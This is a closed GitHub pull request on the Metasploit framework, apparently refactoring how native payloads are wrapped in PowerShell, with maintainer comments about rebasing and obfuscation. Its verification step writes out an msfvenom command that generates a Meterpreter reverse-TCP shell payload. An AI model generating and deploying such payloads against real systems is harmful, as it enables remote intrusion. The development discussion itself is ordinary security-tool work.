Closed red0xff closed 1 year ago
bwatters-r7
commented
2 years ago I was just looking through this, and I realize that the rc4 changes are not here. Would you care to rebase this and manually add the rc4 changes made since this PR was created?
gwillcox-r7
commented
2 years ago @red0xff @bwatters-r7 Any update on this?
bwatters-r7
commented
2 years ago This needs to be either rebased or have someone do a manual deconflict merge. Since the rc4 changes that need to get pulled in were relatively new and I wrote them, I was hoping for the author to deconflict and rebase/retest. It's been long enough that I can go ahead and manually deconflict and merge when I'm back on PRs.
red0xff
commented
2 years ago Hey @bwatters-r7 @gwillcox-r7 , totally forgot about this pull-request, sorry for that, even forgot about its purpose / the reusability I had in mind when I opened it.
I just did a rebase, I'll test it again, and will have a look at the subsequent changes I had in mind when I opened it.
sempervictus
commented
1 year ago quick glance over this makes me think it breaks obfuscation of the powershell. I was never a fan of the templates thing in the 1st place, but the way things work today, you can apply obfu passes to the template's product before encoding, compressing, encrypting, etc.
gwillcox-r7
commented
1 year ago Given this has been open for a while now with no conclusion on how to proceed, and the code has changed significantly since this was opened, I'm going to close this out for now. If we want to proceed with this I'd suggest that we discuss things further if there is still an interest and then look at reopening this PR.
This refactoring moves the code that wraps native payloads in a Powershell script to a separate method
psh_payload. This can reduce redundancy, the lines are used frompsh_payload, but are also the same at:https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/modules/post/multi/manage/shell_to_meterpreter.rb#L144-L160
(If this change is approved, I'll also add a wrapper for
psh_payloadatMsf::Exploit::Powershell, and I'll updatepost/multi/manage/shell_to_meterpreteraccordingly, I made this change because I needed to use the code inpsh_payloadfor fixing another module).I also made a few minor changes to comments. The
exec_rc4was undocumented for example.Verification
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f psh-reflection -o <PATH>psh-reflectionformat atMsf::Util::EXEshould callRex::Powershell::Payload.to_win32pe_psh_reflection, so this should be enough to verify).